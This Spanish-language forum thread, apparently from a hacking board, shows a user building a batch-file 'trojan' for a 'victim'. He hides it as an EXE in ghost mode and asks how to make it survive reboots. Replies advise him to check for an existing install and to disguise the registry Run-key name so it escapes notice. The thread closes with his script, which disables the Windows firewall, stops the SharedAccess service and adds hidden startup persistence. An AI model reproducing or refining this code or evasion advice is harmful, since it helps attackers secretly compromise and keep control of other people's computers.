Como hacer funcionar este batch perfectamente?

Iniciado por SoloAki, 7 Enero 2008, 00:53 AM

0 Miembros y 3 Visitantes están viendo este tema.

Vlad_Asen

#10
Los archivos autoextraibles son ejecutables.

CamaleonB

Pero eso no es una conversion, es una especie de empaquetamiento...Igual yo no le veo mucha utilidad a la conversion....

Existen programas que lo que hacer es crear el batch y ejecutarlo...Pero en ningun momento transformarlo..

salu2

SoloAki

Y la ayuda que pedi :P Ya solucione todas esas cosas uso el Quick Batch Compiler en modo ghost y no aparece ni la ventana de msdos ni la ventana del explorer :D creo que ya esta la duda es que tengo ahora. Cuando vos le das doble click al troyano este desaparece y se crea la carpeta donde lo has puesto por ejemplo windows/system ahi se crea unois archivos la extension y el .exe que le pusiste el nombre. Si por ejemplo pierdo la victima ejecutando otra vez ese .exe es como ejecutar otra vez el troyano?

???

Cita de: Vlad_Asen en 12 Enero 2008, 04:43 AM
Los archivos autoextraibles son ejecutables.

Amigo pasate por la wikipedia, al crear Un SFX no conviertes el Batch a Aplicacion Win32, simplemente lo empaquetas!!!!...

Stacker

Si usas archivos adjuntos al EXE creado, algunas versiones del programa extraen estos archivos al directorio en que es ejecutado. Esto es demasiado ruidoso y alguna vez puede darte problemas.   ;)

Yo tengo la versión 2.1.6.0, y esta versión extrae los archivos en "%userprofile%\Configuración local\Datos de programa", cuando se termina el programa estos archivos son borrados. Y si quisieras copiar algun adjunto a otra ruta lo podrias hacer desde la variable de entorno %MYFILES% que crea QBFC.

Si el troyano lo has echo tu deberia comprobar cada vez que se ejecuta si ya esta instalado para decidir que hacer después.

PD: Por experiencia propia las aplicaciones que se quedan funcionando en segundo plano (con bucles), al apagar el sistema pueden devolver un error, no afectan al programa pero alertan al usuario. (mejor hacer pruebas)

Suerte

SoloAki

Una pregunta como haria para agregarlo al registro asi cuando se reinicia sigue ejecutandose.. ya que cuando por primera vez lo ejecuta y sigue bien pero al reiniciar ya no funcionaria mas no? Quiero que al reiniciar apagar el equipo,etc sigue funcionando jeje.

Novlucker

Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD

"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein

SoloAki

Paa  no entendi nada  :( pero bueno nose si pùede ir esto con lo que lei el Bifrost tiene ActiveX si le tiro random y agarro uno y la agrego pero nose como podria seguir haciendolo otra opcion seria esto?

reg add "hklm\software\microsoft\windows\currentversion\run" /v mibat.bat /d %windir%\system32\mibat.bat /f

pero si hago eso se veria en el msconfig? o en algun otro lado ademas? mi batch se llama sys32.exe y estaria alojado en %Windir%system32\1234\sys32.exe entonces el registro tendria que ser asi

REG ADD "hklm\software\microsoft\windows\currentversion\run" /v sys32.bat /d %windir%\system32\1234\sys32.bat /f

Supuestamente lo agrega al inicio de windows pero entonces donde seria visible por msconfig ? o por inicio de programas? o nose.

Stacker

Seria visible desde msconfig, también con cualquier programa que manipule el registro (regedit, RegCleaner...)
Por lo que: /v sys32.bat, mejor que sea un nombre que se camufle bien, ya que no tiene porque coincidir con el nombre de archivo.

Si con inicio de programas te refieres al del menú inicio, no. De esa forma es suficiente con copiar el archivo a ese directorio. Pero canta mucho y es más facil de eliminar.

Saludos

SoloAki

Este script estaria bien_

Código:
Citar@echo off
netsh firewall set opmode mode = DISABLE
pause
net stop SharedAccess
pause
REG ADD "hklm\software\microsoft\windows\currentversion\run" /v sys32.bat /d %windir%\system32\1234\sys32.bat /f
pause
:bucle
start /min explorer.exe
ping -n 120 localhost > nul
start /min explorer.exe
ping -n 120 localhost > nul
goto bucle